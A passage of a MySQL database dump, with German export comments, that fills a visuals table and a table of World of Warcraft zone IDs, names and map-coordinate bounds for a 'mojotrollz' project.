INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 2, 6, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 2, 7, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 2, 8, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 2, 9, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 3, 0, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 3, 1, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 3, 2, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 3, 3, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 3, 4, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 3, 5, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 3, 6, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 3, 7, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 3, 8, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 3, 9, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 4, 0, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 4, 1, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 4, 2, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 4, 3, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 4, 4, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 4, 5, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 4, 6, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 4, 7, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 4, 8, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 4, 9, ''); /*!40000 ALTER TABLE `mojotrollz_visuals` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.mojotrollz_zone CREATE TABLE IF NOT EXISTS `mojotrollz_zone` ( `ID` int(10) NOT NULL, `name` char(50) NOT NULL, `x1` float NOT NULL, `x2` float NOT NULL, `y1` float NOT NULL, `y2` float NOT NULL, PRIMARY KEY (`ID`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.mojotrollz_zone: ~173 rows (ungefähr) /*!40000 ALTER TABLE `mojotrollz_zone` DISABLE KEYS */; INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (1, 'Dun Morogh', 2137.5, -2760.42, -3941.67, -7206.25); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3, 'Longshore', -1902.08, -4972.92, -5854.17, -7900); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4, 'Blasted Lands', -1193.75, -4856.25, -10583.3, -13025); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (8, 'Swamp of Sorrows', -2081.25, -4589.58, -9535.42, -11208.3); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (10, 'Duskwood', 833.333, -1866.67, -9716.67, -11516.7); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (11, 'Wetlands', -389.583, -4525, -2147.92, -4904.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (12, 'Elwynn Forest', 1535.42, -1935.42, -7939.58, -10254.2); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (14, 'Durotar', -1962.5, -7250, 1808.33, -1716.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (15, 'Dustwallow Marsh', -975, -6225, -2033.33, -5533.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (16, 'Azshara', -3372.92, -8887.5, 5381.25, 1704.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (17, 'The Barrens', 202.083, -5543.75, 1810.42, -2020.83); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (28, 'Western Plaguelands', 416.667, -3883.33, 3366.67, 500); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (33, 'Stranglethorn Vale', 1743.75, -2356.25, -11016.7, -13750); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (38, 'Loch Modan', -1993.75, -4752.08, -4487.5, -6327.08); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (40, 'Westfall', 3016.67, -483.333, -9400, -11733.3); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (41, 'Deadwind Pass', -833.333, -3333.33, -9866.67, -11533.3); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (44, 'Redridge Mountains', -1479.17, -4047.92, -8514.58, -10227.1); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (45, 'Arathi Highlands', -1127.08, -4604.17, -141.667, -2460.42); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (46, 'Burning Steppes', -464.583, -3616.67, -6985.42, -9085.42); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (47, 'The Hinterlands', -1575, -5425, 1466.67, -1100); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (51, 'Searing Gorge', -322.917, -2554.17, -6100, -7587.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (65, 'Dragonblight', 3627.08, -1981.25, 5575, 1835.42); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (66, 'Zul`Drak', -600, -5593.75, 7668.75, 4339.58); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (67, 'The Storm Peaks', 1841.67, -5270.83, 10197.9, 5456.25); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (85, 'Tirisfal Glades', 3033.33, -1485.42, 3837.5, 825); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (130, 'Silverpine Forest', 3450, -750, 1666.67, -1133.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (139, 'Eastern Plaguelands', -2287.5, -6318.75, 3704.17, 1016.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (141, 'Teldrassil', 4235.42, -1639.58, 11847.9, 7931.25); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (148, 'Darkshore', 3016.67, -3447.92, 8222.92, 3912.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (209, 'Shadowfang Keep', 4500, 300, 1133.33, -1666.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (210, 'Icecrown', 5443.75, -827.083, 9427.08, 5245.83); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (215, 'Mulgore', 2204.17, -3245.83, -168.75, -3802.08); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (267, 'Hillsbrad Foothills', 1850, -3012.5, 1481.25, -1760.42); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (331, 'Ashenvale', 1700, -4066.67, 4672.92, 829.167); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (357, 'Feralas', 5441.67, -1508.33, -2366.67, -7000); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (361, 'Felwood', 1797.92, -4264.58, 7237.5, 3195.83); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (394, 'Grizzly Hills', -1110.42, -6360.42, 5516.67, 2016.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (400, 'Thousand Needles', -433.333, -4833.33, -3966.67, -6900); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (405, 'Desolace', 4233.33, -262.5, 452.083, -2545.83); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (406, 'Stonetalon Mountains', 3902.08, -1997.92, 3404.17, -529.167); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (440, 'Tanaris', -62.5, -7275, -5770.83, -10579.2); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (490, 'Un`Goro Crater', 533.333, -3166.67, -5966.67, -8433.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (491, 'Razorfen Kraul', 2766.67, 966.667, 2733.33, 1533.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (493, 'Moonglade', -1381.25, -3689.58, 8491.67, 6952.08); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (495, 'Howling Fjord', -1397.92, -7443.75, 3116.67, -914.583); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (616, 'Hyjal', -929.167, -5175, 6195.83, 3364.58); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (618, 'Winterspring', -991.667, -7141.67, 8793.75, 4693.75); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (722, 'Razorfen Downs', 2766.67, -633.333, 3266.67, 1000); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (796, 'Scarlet Monastery', 1508.33, -800, 1918.75, 379.166); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (1176, 'Zul`Farrak', 1625, 241.667, 2052.08, 1129.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (1196, 'Utgarde Pinnacle', 3275, -3275, 2166.67, -2200); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (1377, 'Silithus', 2983.33, -1075, -5872.92, -8579.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (1497, 'Undercity', 873.193, -86.1824, 1877.94, 1237.84); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (1519, 'Stormwind City', 1722.92, -14.5833, -7995.83, -9154.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (1537, 'Ironforge', -713.591, -1504.22, -4569.24, -5096.85); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (1581, 'The Deadmines', 1966.67, -3033.33, 1133.33, -2200); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (1637, 'Orgrimmar', -3506.35, -5245.73, 2486.67, 1327.08); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (1638, 'Thunder Bluff', 516.667, -527.083, -850, -1545.83); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (1657, 'Darnassus', 3187.5, 1647.92, 10464.6, 9437.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (1977, 'Zul`Gurub', -693.75, -2570.83, -11308.3, -12560.4); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (2017, 'Stratholme', -1766.67, -5166.67, 4333.33, 2066.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (2057, 'Scholomance', 633.333, -1166.67, 600, -600); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (2366, 'The Black Morass', 7650, 6562.5, -1500, -2225); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (2367, 'Old Hillsbrad Foothills', 1854.17, -477.083, 3127.08, 1572.92); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (2597, 'Alterac Valley', 1781.25, -2456.25, 1085.42, -1739.58); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (2677, 'Blackwing Lair', 633.333, -2766.67, -6333.33, -8600); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (2817, 'Crystalsong Forest', 1443.75, -1279.17, 6502.08, 4687.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3277, 'Warsong Gulch', 2041.67, 895.833, 1627.08, 862.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3358, 'Arathi Basin', 1858.33, 102.083, 1508.33, 337.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3428, 'Ahn`Qiraj', 3033.33, 1233.33, -7933.33, -9133.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3429, 'Ruins of Ahn`Qiraj', 3035.42, 522.917, -8233.33, -9908.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3430, 'Eversong Woods', -4487.5, -9412.5, 11041.7, 7758.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3433, 'Ghostlands', -5283.33, -8583.33, 8266.67, 6066.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3456, 'Naxxramas', -2520.83, -4377.08, 3597.92, 2360.42); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3457, 'Karazhan', -1191.67, -2950, -10389.6, -11562.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3483, 'Hellfire Peninsula', 5539.58, 375, 1481.25, -1962.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3487, 'Silvermoon City', -6400.75, -7612.21, 10153.7, 9346.94); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3518, 'Nagrand', 10295.8, 4770.83, 41.6667, -3641.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3519, 'Terokkar Forest', 7083.33, 1683.33, -1000, -4600); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3520, 'Shadowmoon Valley', 4225, -1275, -1947.92, -5614.58); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3521, 'Zangarmarsh', 9475, 4447.92, 1935.42, -1416.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3522, 'Blade`s Edge Mountains', 8845.83, 3420.83, 4408.33, 791.667); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3523, 'Netherstorm', 5483.33, -91.6667, 5456.25, 1739.58); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3524, 'Azuremyst Isle', -10500, -14570.8, -2793.75, -5508.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3525, 'Bloodmyst Isle', -10075, -13337.5, -758.333, -2933.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3537, 'Borean Tundra', 8570.83, 2806.25, 4897.92, 1054.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3557, 'The Exodar', -11066.4, -12123.1, -3609.68, -4314.37); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3562, 'Hellfire Ramparts', 1935.42, 1277.08, -1041.67, -1479.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3606, 'Hyjal Summit', -1525, -4025, 6145.83, 4479.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3703, 'Shattrath City', 6135.26, 4829.01, -1473.95, -2344.79); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3711, 'Sholazar Basin', 6929.17, 2572.92, 7287.5, 4383.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3805, 'Zul`Aman', 1852.08, 583.333, 568.75, -277.083); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3820, 'Eye of the Storm', 2660.42, 389.583, 2918.75, 1404.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (3959, 'Black Temple', 1150, 366.667, 950, 427.083); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4075, 'The Waking Halls', 1206.25, 300, 2012.5, 1408.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4080, 'Isle of Quel`Danas', -5302.08, -8629.17, 13568.8, 11350); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4100, 'The Culling of Stratholme', 2152.08, 327.083, 2297.92, 1081.25); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4131, 'Magisters` Terrace', 250, -297.917, 325, -39.5833); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4196, 'Drak`Tharon Keep', -377.083, -1004.17, -168.75, -587.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4197, 'Wintergrasp', 4329.17, 1354.17, 5716.67, 3733.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4228, 'The Oculus', 2337.5, -262.5, 1956.25, 222.917); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4264, 'Halls of Stone', 2766.67, -633.333, 2200, -66.6667); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4272, 'Halls of Lightning', 2500, -900, 2200, -66.6667); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4273, 'Ulduar', 1583.33, -1704.17, 1168.75, -1022.92); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4277, 'Azjol-Nerub', 1020.83, -52.0833, 872.917, 158.333); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4298, 'Plaguelands: The Scarlet Enclave', -4047.92, -7210.42, 3087.5, 979.167); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4384, 'Strand of the Ancients', 787.5, -956.25, 1883.33, 720.833); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4415, 'The Violet Hold', 983.333, 600, 2006.25, 1750); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4416, 'Gundrak', 1310.42, 166.667, 2122.92, 1360.42); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4493, 'The Obsidian Sanctum', 1133.33, -29.1667, 3616.67, 2841.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4494, 'Ahn`kahet: The Old Kingdom', -233.333, -1206.25, 850, 202.083); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4500, '', 2766.67, -633.333, 2200, -66.6667); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4603, '', 1033.33, -1566.67, 600, -1133.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4706, '', 3439.58, 293.75, -533.333, -2631.25); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4709, '', 1356.25, -6056.25, 204.167, -4737.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4710, '', 525, -2125, 1708.33, -58.3333); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4714, '', 3439.58, 293.75, -533.333, -2631.25); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4720, '', 4383.33, -131.25, 2881.25, -129.167); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4722, '', 2100, -500, 2200, 466.667); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4723, '', 2100, -500, 2200, 466.667); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4737, '', 2129.17, 777.083, -7731.25, -8631.25); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4742, '', 2797.92, -879.167, 10781.2, 8329.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4755, '', 1933.33, 1043.75, -1306.25, -1900); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4809, '', 7033.33, -4366.67, 6466.67, -1133.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4812, '', 6366.67, -5833.33, 5933.33, -2200); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4813, '', 839.583, -693.75, 1256.25, 233.333); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4815, '', 5070.83, 2268.75, -4018.75, -5887.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4820, '', 7033.33, -5966.67, 6466.67, -2200); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4922, '', -2437.5, -7708.33, -2156.25, -5670.83); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4926, '', 2100, -500, 1133.33, -600); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4945, '', 2366.67, -1833.33, 600, -2200); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4950, '', 1166.67, -2233.33, 600, -1666.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (4987, '', 902.083, 150, 3429.17, 2927.08); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5004, '', 2100, -500, 600, -1133.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5031, '', 931.25, -283.333, 2266.67, 1456.25); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5034, '', 2441.67, -3752.08, -8029.17, -12158.3); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5035, '', 2366.67, -1833.33, 600, -2200); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5042, '', 3052.08, -2047.92, 2795.83, -604.167); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5088, '', 2766.67, -633.333, 2200, -66.6667); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5094, '', 1033.33, -1566.67, 600, -1133.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5095, '', 2010.42, -4.16667, -560.417, -1904.17); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5108, '', 1933.33, 1043.75, -1306.25, -1900); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5144, '', 6681.25, 1831.25, -4756.25, -7989.58); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5145, '', 8233.33, 4158.33, -4906.25, -7622.92); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5146, '', 8754.17, 1808.33, -3720.83, -8352.08); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5287, '', 2108.33, -1837.5, -12516.7, -15147.9); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5334, '', 1166.67, -2233.33, 600, -1666.67); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5339, '', 2977.08, -3575, -10964.6, -15333.3); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5351, '', 1933.33, 1043.75, -1306.25, -1900); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5389, '', 2412.5, 575, 377.083, -847.917); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5396, '', -1004.17, -1975, -10591.7, -11239.6); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5416, '', 1556.25, 6.25, 1370.83, 337.5); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5449, '', 1745.83, 443.75, 1604.17, 735.417); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5600, '', 2633.33, 33.3333, 1133.33, -600); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5638, '', 2100, -500, 600, -1133.33); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5695, '', 3891.67, -158.333, -8033.33, -10733.3); INSERT INTO `mojotrollz_zone` (`ID`, `name`, `x1`, `x2`, `y1`, `y2`) VALUES (5723, '', 718.75, -868.75, 425, -633.333); INSERT INTO 